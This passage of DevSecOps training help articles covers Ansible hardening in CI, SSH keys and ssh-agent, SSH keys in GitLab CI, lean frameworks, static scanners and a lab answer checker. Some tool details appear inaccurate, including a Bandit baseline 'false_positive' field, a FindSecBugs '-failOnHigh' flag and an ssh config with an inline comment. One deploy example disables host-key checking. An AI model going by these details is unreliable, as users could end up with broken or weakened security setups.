      - uses: actions/checkout@v4
      - name: Set up SSH key
        run: |
          mkdir -p ~/.ssh && chmod 700 ~/.ssh
          echo "${{ secrets.SSH_PRIVATE_KEY }}" > ~/.ssh/id_rsa
          chmod 600 ~/.ssh/id_rsa
          ssh-keyscan -t rsa ${{ secrets.TARGET_HOST }} >> ~/.ssh/known_hosts
      - name: Install Ansible
        run: sudo apt-get update && sudo apt-get install -y ansible
      - name: Run Linux hardening
        run: |
          ansible-playbook -i inventory.yml linux-hardening.yml
```

If any task in linux-hardening.yml fails, the job stops with a red X, providing immediate feedback to developers.

4. Common Questions & Tips

Q1: Will a “changed” task cause the pipeline to fail?
A: No. “changed” is a normal part of idempotent automation. Only a non‑zero exit code (failed/unreachable) triggers a failure.

Q2: Can I ignore a specific hardening failure without breaking the whole pipeline?
A: Use ignore_errors: true on the task and evaluate the result later. Example:

```yaml
- name: Ensure auditd is installed
  package:
    name: auditd
    state: present
  ignore_errors: true
  register: auditd_res
```

Q3: Do I need to add every host to known_hosts?
A: For static inventories, yes, once per host. For dynamic inventories, you can automate the ssh-keyscan step inside the pipeline.

Q4: How do I handle Windows hosts that require self‑signed certificates?
A: Export the certificate, store it as a secret, and configure WinRM with ansible_winrm_transport=certificate.
See the ansible-collection-hardening docs for a ready‑made role.

Tips for a Smooth Experience

- Validate playbooks locally with ansible-playbook --check --diff before committing.
- Enable Ansible’s --flush-cache in CI to avoid stale facts.
- Log the full Ansible output (-vvv) to aid debugging when a build fails.
- Separate “audit” and “remediate” runs – first run a read‑only audit playbook, then conditionally trigger the hardening playbook only if drift is detected.

5. Summary

Hardening Linux and Windows systems with Ansible fits naturally into a CI/CD pipeline:

- Failure detection relies on Ansible’s exit codes; any task that cannot apply a security control will cause the build to fail.
- Authentication differs by OS – SSH for Linux (with known_hosts verification) and WinRM for Windows (password or certificate).
- Lab environments often simplify credential handling, but production pipelines must use secret management and host verification.

By following the workflow and best‑practice tips outlined above, you can deliver continuously hardened infrastructure, catch compliance gaps early, and maintain a secure DevSecOps posture. Happy automating!
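The last tip above, separating audit and remediate runs, can be sketched in a few lines of shell. The `run_audit` function below is a stand-in for a real read-only audit playbook, and the playbook names in the comments are hypothetical:

```shell
# Audit-then-remediate pattern: only run the hardening playbook when
# the read-only audit exits non-zero (i.e., drift was detected).
run_audit() {
  # Stand-in for: ansible-playbook -i inventory.yml audit.yml --check
  return 2   # pretend the audit found drift
}

if run_audit; then
  echo "no drift - skipping remediation"
else
  echo "drift detected - running remediation playbook"
  # ansible-playbook -i inventory.yml harden.yml
fi
```

In a real pipeline each branch would be a separate CI stage, with the remediation stage gated on the audit stage's result.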

Last updated on Jan 06, 2026


SSH Key Management & Authentication Agent: A Complete Guide for DevSecOps Learners

Managing SSH keys securely is a core skill for anyone working in DevSecOps. This article explains why you add host keys to known_hosts, what the ssh-add command does, how the SSH authentication agent works, and where its configuration lives. By the end of the guide you’ll be able to set up and use SSH keys confidently in labs, real‑world projects, and certification exams.

Table of Contents

1. Why Add the Server’s Host Key to known_hosts?
2. Understanding the ssh-add Command
3. The SSH Authentication Agent Explained
   - Where Is the Agent Configured?
4. Practical Walk‑through: From Key Generation to Connection
5. Tips & Common Questions

Why Add the Server’s Host Key to known_hosts?

When you SSH to a server for the first time, SSH stores the server’s host key in ~/.ssh/known_hosts. This file acts as a fingerprint record that tells your client, “I have connected to this exact server before; if the fingerprint changes, something is wrong.”

Adding a host key manually

In many DevSecOps labs you are asked to run a command such as:

```shell
ssh-keyscan -t rsa devsecops-box-p29i9pmx >> ~/.ssh/known_hosts
```

Even though the command targets your own lab machine’s hostname, the same security principle applies:

| Reason | What Happens |
|--------|--------------|
| Man‑in‑the‑Middle (MITM) protection | The client verifies the server’s host key against the entry in known_hosts. If an attacker tries to impersonate the server, the fingerprint won’t match and the connection is aborted. |
| Predictable environment | Labs often spin up fresh VMs. Adding the host key manually guarantees that the client trusts the exact instance you intend to use, avoiding the “Are you sure you want to continue connecting (yes/no)?” prompt. |
| Automation friendliness | Scripts that run non‑interactive SSH commands (e.g., scp, ansible) need a pre‑populated known_hosts to avoid hanging for user input. |

Bottom line: Adding the host’s public key to known_hosts is a verification step, not a way to “give the server access to you.” It assures you are talking to the right server. For a deeper dive, see the SSH Academy article on Known Host Keys.

Understanding the ssh-add Command

ssh-add works with the SSH authentication agent (often ssh-agent). Its purpose is to load private keys into the agent so you don’t have to type a passphrase for each new SSH connection.

What ssh-add does

1. Reads a private key (default is ~/.ssh/id_rsa if you run ssh-add without arguments).
2. Prompts for the key’s passphrase (if the key is encrypted).
3. Stores the decrypted key in memory inside the running ssh-agent.
4. Makes the key available to any SSH client that contacts the agent during the same session.

Typical usage patterns

```shell
# Start an agent (most shells do this automatically)
eval "$(ssh-agent -s)"

# Add the default key
ssh-add                      # prompts for passphrase if needed

# Add a specific key
ssh-add ~/.ssh/ci_deploy_rsa

# List keys currently loaded
ssh-add -l

# Remove all keys (useful before switching projects)
ssh-add -D
```

Why use ssh-add?

- Convenience: One passphrase entry per session, not per connection.
- Security: Private keys never touch the disk after being loaded; they stay in the agent’s protected memory.
- Automation: CI/CD pipelines can load keys once and then run many Git or remote‑exec commands without interactive prompts.

The SSH Authentication Agent Explained

ssh-agent is a background daemon that holds your decrypted private keys and supplies them to SSH clients on demand.

Core responsibilities

- Key storage: Keeps decrypted private keys in process memory only; the agent never writes them to disk.
- Signing requests: When a remote server challenges you, the agent signs the challenge with the appropriate private key and returns the signature.
- Key selection: If multiple keys are loaded, the agent can try them sequentially or based on the IdentitiesOnly option.
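Because SSH clients locate a running agent through the SSH_AUTH_SOCK environment variable (a Unix socket path), you can check whether an agent is reachable before calling ssh-add. A minimal sketch; the `agent_status` helper is illustrative:

```shell
# Is an ssh-agent reachable in this shell? Clients find the agent via
# the Unix socket path stored in SSH_AUTH_SOCK.
agent_status() {
  if [ -S "${SSH_AUTH_SOCK:-}" ]; then
    echo "agent socket present: $SSH_AUTH_SOCK"
  else
    echo "no agent - start one with: eval \"\$(ssh-agent -s)\""
  fi
}

agent_status
```

This is the same condition behind the classic "Could not open a connection to your authentication agent" error: the variable is unset, or points at a socket whose agent has exited.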
Where is the agent’s configuration stored?

The agent itself does not have a persistent configuration file. Instead, you control its behavior through:

| File | Purpose |
|------|---------|
| ~/.ssh/config | Per‑host or global SSH client settings (e.g., AddKeysToAgent yes, IdentityFile ~/.ssh/id_rsa). |
| Environment variables | SSH_AUTH_SOCK points to the Unix socket the agent listens on; SSH_AGENT_PID holds the process ID. |
| Shell startup scripts (~/.bashrc, ~/.zshrc) | Often contain eval "$(ssh-agent -s)" and ssh-add commands to start the agent automatically. |

Example ~/.ssh/config snippet:

```
Host *
  AddKeysToAgent yes
  UseKeychain yes          # macOS only – stores passphrase in the system keychain
  IdentityFile ~/.ssh/id_rsa
```

Practical Walk‑through: From Key Generation to Connection

Below is a step‑by‑step example that mirrors a typical DevSecOps lab.

1. Generate a new key pair (skip if you already have one).

```shell
ssh-keygen -t rsa -b 4096 -C "student@example.com"
# Accept default location (~/.ssh/id_rsa) and set a strong passphrase.
```

2. Add the server’s host key to known_hosts.

```shell
ssh-keyscan -t rsa devsecops-box-p29i9pmx >> ~/.ssh/known_hosts
```

3. Start the authentication agent (if not already running).

```shell
eval "$(ssh-agent -s)"
```

4. Load your private key into the agent.

```shell
ssh-add ~/.ssh/id_rsa
```

5. Connect to the lab machine.

```shell
ssh devsecops@devsecops-box-p29i9pmx
```

Because the host key is already trusted and the private key is cached in the agent, the connection proceeds without any further prompts.

6. Optional: Verify the loaded keys.

```shell
ssh-add -l   # shows fingerprints of keys held by the agent
```

Tips & Common Questions

✅ Tips for Smooth SSH Workflows

- Add keys automatically: Include AddKeysToAgent yes in ~/.ssh/config so ssh adds a key to the agent the first time you use it.
- Use the macOS Keychain: On macOS, UseKeychain yes stores the passphrase securely and reloads it after reboots.
- Limit known_hosts size: Periodically prune stale entries with ssh-keygen -R hostname.
- Forward the agent when needed: Use ssh -A or set ForwardAgent yes in the config to let remote hosts use your local keys (use with caution).

❓ Frequently Asked Questions

| Question | Answer |
|----------|--------|
| Do I need to add my public key to known_hosts? | No. known_hosts stores host keys, not your public key. The command ssh-keyscan fetches the server’s host key and appends it. |
| What if I forget to start ssh-agent? | SSH will fall back to asking for the key’s passphrase each time. Run eval "$(ssh-agent -s)" and ssh-add to fix it. |
| Can I store the agent’s socket in a custom location? | Yes – set SSH_AUTH_SOCK=/tmp/custom_agent.sock before launching ssh-agent. This is useful for containerized environments. |
| Is ssh-add -D safe to run? | It removes all keys from the current agent session. It’s safe, but you’ll need to re‑add any keys you still need. |
| Why does ssh-add sometimes say “Could not open a connection to your authentication agent”? | The environment variable SSH_AUTH_SOCK is missing or points to a dead socket. Start a new agent with eval "$(ssh-agent -s)". |
| How is the DevSecOps Box always able to SSH into prod, even after I killed the ssh-agent on it? | The lab stores a private key for the production machine by default; as long as that key is present, you can SSH into production. In the DevSecOps Box the key lives at /root/.ssh/id_rsa, and it is what authenticates the connection. If you remove it from /root/.ssh/, you will no longer be able to SSH into the production machine. |

Wrap‑Up

Effective SSH key management hinges on three pillars:

1. Trust the server – populate known_hosts with verified host keys.
2. Securely store private keys – load them once into ssh-agent using ssh-add.
3. Configure the client – use ~/.ssh/config to automate agent usage and key selection.
By following the steps and best practices outlined above, you’ll reduce friction in labs, avoid common security pitfalls, and be ready for any DevSecOps certification exam that tests SSH proficiency. Happy secure connecting!

Last updated on Jan 26, 2026


SSH Keys in GitLab CI/CD: Why Double Quotes Matter & How to Fix Common Errors

Working with SSH keys inside GitLab CI/CD pipelines can be tricky, especially for newcomers to DevSecOps. Small syntax issues – like missing double quotes – or malformed key data often lead to confusing error messages such as “Invalid format” or “Error loading key … error in libcrypto.” This article explains the role of double quotes when handling SSH‑key variables, walks you through the most frequent GitLab CI errors, and provides step‑by‑step solutions so your pipelines run smoothly.

Table of Contents

1. Why Double Quotes Are Required for SSH Key Variables
2. Typical GitLab CI Errors Involving SSH Keys
   - 2.1 Invalid Format Errors
   - 2.2 Libcrypto Loading Errors
3. Step‑by‑Step Fixes
   - 3.1 Correctly Storing and Referencing Keys
   - 3.2 Testing the Key Inside a Job
4. Practical Example: Deploying with a Private Key
5. Tips & Best Practices
6. Common Questions

Why Double Quotes Are Required

Variable Expansion vs. Word Splitting

- With double quotes ("$SSH_KEY"): The shell expands the variable once and treats the entire content as a single argument. This preserves the line breaks and spaces that are intrinsic to PEM‑formatted keys.
- Without double quotes ($SSH_KEY): The shell performs word splitting on whitespace. Each line of the key becomes a separate argument, breaking the PEM structure and causing the SSH client to reject the key.

What Happens Inside a GitLab CI Job?

```yaml
script:
  - echo $SSH_KEY                          # ❌ Splits on newlines → corrupted key
  - echo "$SSH_KEY" > /root/.ssh/id_rsa    # ✅ Correct, preserves format
```

Using double quotes ensures the private key is written exactly as it appears in the GitLab CI/CD variable, preventing “Invalid format” and “error in libcrypto” failures.

Typical GitLab CI Errors Involving SSH Keys

1. Invalid Format Error

Symptom:

```
ERROR: Invalid format
```

Cause: The key stored in the CI/CD variable has been altered – usually by extra spaces, missing line breaks, or HTML‑entity conversion during copy‑paste.

Root Sources:

- Copy‑pasting from a web page that adds invisible characters.
- Saving the key in a text editor that strips trailing newlines.
- Marking the variable “Protected” when the job runs on an unprotected branch – the variable is then empty in the job, producing an empty, invalid key file.

2. Libcrypto Loading Error

Symptom:

```
Error loading key "/root/.ssh/id_rsa": error in libcrypto
```

Cause: OpenSSL’s libcrypto cannot parse the PEM data because the file is malformed (often due to missing double quotes or truncated content).

Typical Trigger: Running a script that references $SSH_KEY without quoting, leading to a broken file on the runner.

Step‑by‑Step Fixes

1. Store the Private Key Correctly

1. Open the key in a plain‑text editor (e.g., VS Code, Notepad++) and verify it starts with -----BEGIN RSA PRIVATE KEY----- and ends with -----END RSA PRIVATE KEY-----.
2. Copy the entire block, including line breaks.
3. In GitLab, go to Settings → CI/CD → Variables → Add Variable:
   - Key: SSH_KEY
   - Value: Paste the key exactly as copied.
   - Mask: ✅ (optional, hides the value in job logs)
   - Protected: ✅ (if only protected branches need it)
   - Environment scope: * (or limit as required)

2. Write the Key Inside the Job Using Double Quotes

```yaml
deploy:
  stage: deploy
  image: alpine:latest
  script:
    # Create .ssh directory with proper permissions
    - mkdir -p /root/.ssh
    - chmod 700 /root/.ssh
    # Write the key – note the double quotes!
    - echo "$SSH_KEY" > /root/.ssh/id_rsa
    - chmod 600 /root/.ssh/id_rsa
    # Verify the key can be read
    - ssh-keygen -y -f /root/.ssh/id_rsa > /dev/null
```

If the ssh-keygen command succeeds, the key is correctly formatted.

Practical Example: Deploying a Service via SSH

```yaml
stages:
  - build
  - deploy

build_job:
  stage: build
  script:
    - echo "Building Docker image..."
    - docker build -t myapp:${CI_COMMIT_SHA} .

deploy_job:
  stage: deploy
  image: ubuntu:20.04
  before_script:
    - apt-get update && apt-get install -y openssh-client
  script:
    - mkdir -p /root/.ssh && chmod 700 /root/.ssh
    - echo "$SSH_KEY" > /root/.ssh/id_rsa && chmod 600 /root/.ssh/id_rsa
    - ssh -o StrictHostKeyChecking=no user@my.server.com "docker pull myapp:${CI_COMMIT_SHA} && docker run -d myapp:${CI_COMMIT_SHA}"
```

Notice the double‑quoted $SSH_KEY and the explicit permission settings – both are essential to avoid format‑related failures.

Tips & Best Practices

- Always use double quotes when expanding multi‑line variables in Bash scripts.
- Validate the key locally with ssh-keygen -y -f <file> before committing it to GitLab.
- Enable “Mask” for secret variables to prevent accidental exposure in job logs.
- Keep the key file permissions tight (chmod 600) to satisfy SSH security checks.
- Test the pipeline in a protected branch first; this prevents accidental runs on the main branch with malformed keys.
- Document the exact copy‑paste steps (e.g., start at line 1, include the final newline) in your internal runbooks.

Common Questions

| Question | Answer |
|----------|--------|
| Do I need double quotes for other multi‑line variables? | Yes. Any variable that contains spaces, newlines, or special characters should be quoted to avoid word splitting. |
| Why does GitLab show “Invalid format” even though the key works locally? | The CI/CD UI may trim trailing newlines or convert line‑break characters. Re‑copy the key using a plain‑text editor and ensure the variable value ends with a newline. |
| Can I store the public key instead of the private one? | For authentication you need the private key on the runner. The public key belongs on the remote server’s authorized_keys. |
| What does the “Protected” flag do? | It limits the variable’s availability to pipelines that run on protected branches or tags, adding an extra security layer. |
| My job still fails with libcrypto after quoting. What next? | Verify the key file on the runner (cat /root/.ssh/id_rsa) to confirm it matches the original. If it’s truncated, re‑enter the variable value. |

By understanding why double quotes are essential, correctly storing your SSH key in GitLab, and following the troubleshooting steps above, you’ll eliminate the most common SSH‑related CI/CD failures and keep your DevSecOps pipelines secure and reliable. Happy coding!
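The word-splitting behaviour described above is easy to reproduce locally. In this sketch, KEY stands in for a multi-line secret such as $SSH_KEY:

```shell
# A fake multi-line "private key" (stand-in for $SSH_KEY).
KEY="line1
line2
line3"

# Unquoted: the shell splits on whitespace, collapsing the newlines.
unquoted=$(echo $KEY)

# Quoted: the value is passed through intact, newlines preserved.
quoted=$(echo "$KEY")

echo "$unquoted"         # a single mangled line
echo "$quoted" | wc -l   # three intact lines
```

Writing the unquoted result to id_rsa is exactly how the one-line, unparseable key files behind the “Invalid format” and libcrypto errors come into being.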

Last updated on Jan 06, 2026


Development Best Practices: Why Simpler Solutions Beat Overly Complex Frameworks In today’s fast‑paced DevSecOps landscape, it’s tempting to reach for the newest, biggest framework that promises “everything.” While powerful libraries can accelerate development, they also introduce hidden costs—longer build times, larger attack surfaces, and steeper learning curves for team members. This article explains why you should avoid overly complex frameworks, how to recognize when a lightweight solution is more appropriate, and practical steps you can take to keep your codebase lean, secure, and maintainable. Table of Contents 1. Understanding the “Big Framework” Pitfall 2. When Simpler Is Better: Real‑World Scenarios 3. Guidelines for Choosing the Right Toolset 4. Practical Steps to Refactor Existing Projects 5. Tips & Common Questions Understanding the “Big Framework” Pitfall What does “avoid big frameworks” really mean? - Focus on the problem, not the tool – Use the smallest library that solves the immediate requirement. - Minimize dependencies – Every additional package adds potential bugs, security vulnerabilities, and maintenance overhead. - Preserve agility – Smaller codebases are easier to understand, test, and modify, which is essential for rapid DevSecOps cycles. 
Hidden costs of large frameworks | Cost Category | Typical Impact | Example | |---------------|----------------|---------| | Performance | Increased bundle size → slower load times | A single‑page app that loads a 10 MB framework bundle for a feature that could be done with vanilla JavaScript | | Security | Larger attack surface; more third‑party code to audit | Unpatched transitive dependencies in a monolithic UI library | | Team Velocity | Steeper learning curve, onboarding delays | New hires spend weeks learning the conventions of a complex MVC framework | | Maintenance | Frequent breaking changes in major releases | Upgrading from Angular 12 to 13 requires extensive code rewrites | When Simpler Is Better: Real‑World Scenarios 1. Tiny utility scripts Scenario: You need to parse a CSV file and generate a summary report. Complex solution: Import a full‑featured data‑processing framework (e.g., Pandas in Python). Simpler solution: Use Python’s built‑in csv module or a lightweight library like csv‑kit. 2. Static website or documentation site Scenario: Publishing API documentation that rarely changes. Complex solution: Deploy a full React/Next.js application. Simpler solution: Use a static site generator such as MkDocs or Hugo, which produces pre‑rendered HTML with minimal JavaScript. 3. CI/CD pipeline scripting Scenario: A custom step to validate JSON schema before deployment. Complex solution: Install a large Node.js framework with many plugins. Simpler solution: Use a single‑file CLI tool like ajv-cli or a small Bash script with jq. Guidelines for Choosing the Right Toolset 1. Define the core requirement first - Write a concise problem statement (e.g., “Read a JSON file and output a sorted list”). - List non‑functional constraints: performance, security, team expertise. 2. 
Evaluate alternatives with a decision matrix | Criteria | Weight (1‑5) | Option A (Lightweight) | Option B (Heavy) | |----------|--------------|------------------------|------------------| | Learning curve | 4 | 5 | 2 | | Bundle size | 5 | 5 | 1 | | Community support | 3 | 3 | 5 | | Feature completeness | 2 | 3 | 5 | | Security track record | 4 | 4 | 3 | | Total Score | – | (calc) | (calc) | Select the option with the highest weighted score. 3. Adopt “Progressive Enhancement” - Start with a minimal implementation. - Add libraries only when a clear, documented need arises (e.g., a specific performance optimization that cannot be achieved otherwise). 4. Keep dependencies explicit and audited - Pin versions in package.json, requirements.txt, or go.mod. - Use automated tools (Dependabot, Renovate, Snyk) to monitor vulnerabilities. Practical Steps to Refactor Existing Projects 1. Audit your dependency tree # Node.js example npm ls --depth=0 # Python example pipdeptree --freeze 2. Identify “unused” or “over‑engineered” packages – Look for libraries that are imported in only one file or that provide far more functionality than required. 3. Replace with native APIs or micro‑libraries - Replace lodash functions with native ES6 equivalents (Array.prototype.map, Object.entries, etc.). - Swap a full ORM for a lightweight query builder if you only need simple CRUD operations. 4. Write unit tests before refactoring – Guarantees behavior stays consistent. 5. Iteratively remove – Remove one dependency at a time, run the test suite, and commit the change. 6. Document the decision – Add a brief comment or README entry explaining why the simpler approach was chosen. Tips & Common Questions Tips for Learners - Start small: Build a prototype with vanilla code before reaching for a framework. - Leverage language features: Modern JavaScript, Python, and Go have many built‑in capabilities that previously required external libraries. 
- Use “sandbox” projects: Experiment with a lightweight stack in a throwaway repo to compare performance and complexity. Common Questions | Question | Answer | |----------|--------| | Is it ever okay to use a large framework? | Yes, when the project scope demands features that would be prohibitively expensive to implement from scratch (e.g., enterprise‑grade routing, state management, or internationalization). | | How do I convince my team to drop an existing heavy framework? | Present a cost‑benefit analysis (maintenance time, security risk, performance metrics) and propose a phased migration plan. | | What if the lightweight solution lacks community support? | Verify the library’s maintenance frequency, open‑issue response time, and security track record before adoption. If risk is high, consider building a small internal wrapper. | | Can I combine a lightweight core with optional plugins? | Absolutely. Many frameworks (e.g., Vue.js, Express) support a core‑plus‑plugins architecture that lets you add features only when needed. | Bottom Line Choosing the right level of abstraction is a cornerstone of DevSecOps excellence. By prioritizing simplicity, you reduce build times, shrink the attack surface, and keep your team moving fast. Evaluate every new library against the problem you’re solving, and remember: the best framework is the one you don’t have to use.
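The weighted decision matrix from the guidelines section can be totalled mechanically. A minimal sketch with awk, using the sample weights and scores from that table (the CSV layout and criterion names are ad hoc):

```shell
# Weighted scoring: criterion,weight,optionA(lightweight),optionB(heavy)
# Total per option = sum(weight * score).
totals=$(printf '%s\n' \
  "learning-curve,4,5,2" \
  "bundle-size,5,5,1" \
  "community,3,3,5" \
  "features,2,3,5" \
  "security,4,4,3" |
awk -F, '{a += $2 * $3; b += $2 * $4}
         END {printf "Lightweight=%d Heavy=%d", a, b}')
echo "$totals"
```

With these sample numbers the lightweight option wins 76 to 50; plugging in your own weights and scores keeps the comparison honest and repeatable.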

Last updated on Jan 06, 2026


Static Analysis Tools Overview: Bandit, Bundler‑Audit, FindSecBugs & AuditJS

Static application security testing (SAST) is a cornerstone of any DevSecOps pipeline. In the Practical DevSecOps training you’ll encounter four widely‑used open‑source scanners: Bandit, Bundler‑Audit, FindSecBugs, and AuditJS. This article explains why some tools require extra prerequisites, how to handle false positives, filter results by severity, improve scan commands, and troubleshoot common errors such as exit‑code handling and ignore‑file formatting.

1. Bundler‑Audit – Why Ruby Is Needed on Your Local Machine but Not in GitLab

1.1 Installation methods matter

| Method | How it works | When you need Ruby | Typical use case |
|--------|--------------|--------------------|------------------|
| Docker (GitLab CI) | The tool runs inside a pre‑built container that already contains Ruby, Bundler, and the bundler-audit gem. | No – the container isolates the runtime. | Fast, reproducible CI pipelines; no host‑level dependencies. |
| Native (local or self‑hosted CI) | You install the gem directly with gem install bundler-audit. | Yes – the host must have a compatible Ruby interpreter and the gem command. | Quick local testing, custom environments, or when Docker is not an option. |

1.2 Practical tip

- CI/CD (GitLab/GitHub): Use a Ruby‑based image (e.g., the official ruby:2.7 image with the bundler-audit gem installed, or a custom image) and invoke bundler-audit inside the job script.
- Local development: Install Ruby (via rbenv, rvm, or your package manager), then run gem install bundler-audit.

By leveraging Docker, the pipeline avoids “Ruby not found” errors and guarantees the same version of the scanner across all runs.

2. Bandit – Handling False Positives in the Baseline File

2.1 What is a baseline file?

A baseline (.bandit-baseline.json) stores findings from a previous scan. During a new scan, Bandit compares current results against the baseline and flags any new issues.
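Conceptually, the baseline mechanism is a set difference: report only the findings that are not already in the triaged baseline. A toy illustration (the file names and test IDs below are made up; real Bandit baselines are JSON reports, not plain lists):

```shell
# Previously triaged findings (the "baseline") vs. a fresh scan.
# comm -13 prints lines that appear only in the second (sorted) file,
# i.e. findings that are new since the baseline was recorded.
printf 'B101\nB303\n'       > baseline.txt
printf 'B101\nB303\nB602\n' > current.txt
new_findings=$(comm -13 baseline.txt current.txt)
echo "$new_findings"
rm -f baseline.txt current.txt
```

Here only the new finding survives the comparison; everything already accepted in the baseline is filtered out, which is exactly why editing the baseline changes what a rescan reports.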
2.2 Why your changes seem ignored

- All baseline entries are still displayed – Bandit shows every issue that exists in the baseline, regardless of whether you edited the source file.
- Only one entry needs to be marked as false‑positive – As soon as a single issue in the baseline is flagged with "false_positive": true, the overall scan will display a green tick.

2.3 Step‑by‑step fix

1. Open the baseline snippet: https://gitlab.practical-devsecops.training/-/snippets/15.
2. Locate the issue you want to suppress and set "false_positive": true.
3. Commit the updated baseline file.
4. Re‑run the scan against the baseline: bandit -r . -b .bandit-baseline.json (note that -b/--baseline takes the baseline report; -c is Bandit’s configuration-file flag).

Now the scan will treat that entry as ignored, and the pipeline will pass.

3. Bandit – Failing a Build Only on High‑Severity Findings

Bandit’s repeatable -l flag raises the minimum severity that is reported – and therefore the severity that can produce a non‑zero exit status.

```shell
# Fail the job only when HIGH severity issues are found
bandit -r . -lll   # each additional l raises the threshold; -lll reports HIGH only
```

| Flag | Meaning |
|------|---------|
| -l | Report LOW severity and above (i.e., everything). |
| -ll | Report MEDIUM severity and above. |
| -lll | Report HIGH severity only – lower‑severity findings no longer affect the exit code. |
| -x | Exclude files or directories. |

You can also combine with --exit-zero to always succeed and rely on a separate script to parse the JSON output for high‑severity findings.

4. FindSecBugs – Aligning the Scan with DevSecOps Best Practices

4.1 Current command (example)

```shell
findsecbugs -output findsecbugs-report.xml -progress -low -medium -high .
```

4.2 Recommendations for a production‑grade pipeline

1. Limit output to actionable severities – Drop low‑severity findings to reduce noise.

```shell
findsecbugs -output findsecbugs-report.xml -medium -high .
```

2. Use a machine‑readable format – XML (or SARIF) integrates easily with CI dashboards, DefectDojo, or GitLab Security Reports.
3. Fail the job on critical findings – Add -failOnHigh (or parse the XML after the scan).
4.3 Sample improved command

```shell
findsecbugs -output findsecbugs-report.sarif \
  -medium -high \
  -failOnHigh \
  -progress .
```

This command produces a SARIF file that can be uploaded to GitLab/GitHub security dashboards and aborts the pipeline if any high‑severity issue is detected.

5. AuditJS – Ignoring Specific Vulnerabilities

AuditJS reads an ignore file (auditjs-ignore.json) that must be valid JSON. A common mistake is using trailing commas or comments, which break the parser.

5.1 Correct ignore‑file structure

```json
{
  "ignore": [
    {
      "module": "lodash",
      "version": "4.17.15",
      "reason": "Patched in downstream library"
    },
    {
      "module": "express",
      "version": "4.16.0",
      "reason": "False positive – not used in production"
    }
  ]
}
```

5.2 How to use it

```shell
auditjs scan . --ignore-file auditjs-ignore.json
```

If you still see errors, run jq . auditjs-ignore.json to validate the JSON syntax.

6. Bandit Exit Codes – Why Piping Changes the Result

- Without piping: bandit -r . -f json returns exit code 1 when any issue (of any severity) is found.
- With piping: bandit -r . -f json | tee bandit-output.json returns exit code 0 because the pipeline’s final command (tee) succeeds, masking Bandit’s original status.

6.1 Preserve Bandit’s exit code

```shell
bandit -r . -f json | tee bandit-output.json
# Capture Bandit's status in $PIPESTATUS (bash)
if [ ${PIPESTATUS[0]} -ne 0 ]; then
  echo "Bandit detected vulnerabilities"
  exit 1
fi
```

Or use set -o pipefail at the start of the script to propagate the first non‑zero status.

7. Quick Reference & Tips

| Topic | Command / Tip |
|-------|---------------|
| Run Bundler‑Audit in CI | docker run --rm -v $(pwd):/app -w /app ruby:2.7 bundler-audit check --update |
| Mark Bandit false‑positive | Edit baseline JSON → "false_positive": true |
| Fail on high Bandit issues only | bandit -r . -lll |
| FindSecBugs high‑severity only | findsecbugs -output report.sarif -medium -high -failOnHigh . |
| Validate AuditJS ignore file | jq . auditjs-ignore.json |
| Preserve exit code with pipe | set -o pipefail or check ${PIPESTATUS[0]} |

Final Thought

Integrating these static analysis tools with the right installation method, output handling, and error‑checking logic turns a simple scan into a robust DevSecOps control. By following the patterns above, you’ll keep pipelines fast, results reproducible, and security findings actionable. Happy scanning!
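The pipe-masking behaviour from section 6 is not specific to Bandit; it can be reproduced with any failing command. Bash is assumed here, since pipefail and PIPESTATUS are bash features:

```shell
# Without pipefail, a pipeline's status is the LAST command's (cat),
# not the failing scanner's.
no_pipefail=$(bash -c 'false | cat; echo $?')

# With pipefail, the first non-zero status wins - which is what a CI
# job needs in order to fail on scanner findings.
with_pipefail=$(bash -c 'set -o pipefail; false | cat; echo $?')

echo "without pipefail: $no_pipefail"
echo "with pipefail: $with_pipefail"
```

Substitute `false` with `bandit -r . -f json` and `cat` with `tee bandit-output.json` and you have exactly the scenario described above.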

Last updated on Jan 06, 2026


Learn how to verify your answers, avoid common pitfalls with the Automatic Answer Checker (AAC), and understand the current limits on resetting lab progress.

Introduction

DevSecOps learners often encounter two recurring technical concerns: the Automatic Answer Checker (AAC) marking a correct response as wrong, and the desire to reset lab progress after a mistake or a change in learning path. This article explains why the AAC can be finicky, how to confirm your answer against the expected format, and what options (or limitations) exist for managing lab progress. By following the practical steps below, you'll reduce frustration, keep your learning momentum, and know exactly when to reach out to technical support.

1. Why the Automatic Answer Checker May Flag a Correct Answer

The AAC is designed to provide instant feedback, but its strict validation rules can sometimes clash with a learner's interpretation of a "correct" answer.

1.1 Case sensitivity
- Upper case vs. lower case: Password123 ≠ password123.
- The AAC treats each character exactly as stored in the answer key.

1.2 Whitespace and punctuation
- Leading/trailing spaces ("admin " vs. "admin").
- Extra line breaks or missing commas in list-type answers.

1.3 Expected format or token
- Some challenges require a specific token (e.g., a UUID, hash, or secret key).
- Even if the token works in the lab, the AAC will only accept the exact string it expects.

1.4 Context vs. exact match
- The AAC does not evaluate the functionality of your answer; it checks for an exact string match.
- A logically correct command that uses a different flag order may be rejected.

2. How to Verify Your Answer with the AAC

Before assuming the AAC is wrong, use the built-in Answer button to compare your submission:

1. Click the "Answer" button next to the challenge.
2. The platform will display the reference answer(s).
3. Compare your entry line by line, paying attention to:
   - Capitalization
   - Spaces and line breaks
   - Exact punctuation (quotes, commas, brackets)

Example

| Your submission | Reference answer | Issue |
|-----------------|------------------|-------|
| docker run -d nginx | docker run -d nginx:latest | Missing tag (:latest) |
| admin  | admin | Trailing space (invisible difference) |

If the differences are only cosmetic (e.g., extra spaces), edit your answer to match the reference format exactly and resubmit.

3. Lab Progress Management

3.1 Can you reset lab progress?

Current policy: there is no built-in mechanism to reset a lab's progress once you've started. This limitation helps preserve the integrity of the learning path and the automated grading logic.

3.2 Work-arounds and best practices
- Start a new lab instance (if the platform offers a "Restart Lab" button).
- Create a fresh workspace in the lab environment (e.g., a new Docker container or VM snapshot).
- Document your steps in a personal notebook so you can revert manually if needed.

3.3 When to contact support

If you encounter a lab-environment failure (e.g., corrupted container, missing resources) that prevents you from completing the lab, open a ticket. Support can:
- Provision a new lab instance for you.
- Provide a temporary "reset" link for the specific lab (rare, but possible for critical bugs).

4. Common Questions

| Question | Answer |
|----------|--------|
| Why does the AAC reject my answer even though the command works? | The AAC validates the exact string, not execution results. Match the reference format precisely. |
| Can I ignore case sensitivity? | No. The AAC is case-sensitive by design. Use the exact capitalization shown in the reference answer. |
| Is there any way to "undo" a lab step? | Not directly. You can manually revert changes in the lab environment (e.g., delete a created file) or restart the lab if the UI permits. |
| What information should I include when requesting a support agent? | Lab name, challenge title, your submitted answer, a screenshot of the reference answer, and any steps you've already tried. |
| Will resetting a lab affect my certification eligibility? | Since resetting isn't currently supported, there's no impact on certification. If a reset is granted by support, it will be logged but won't affect your eligibility. |

5. Tips for Success
- Copy, don't type: when possible, copy the reference answer and edit only the variable part. This eliminates hidden characters.
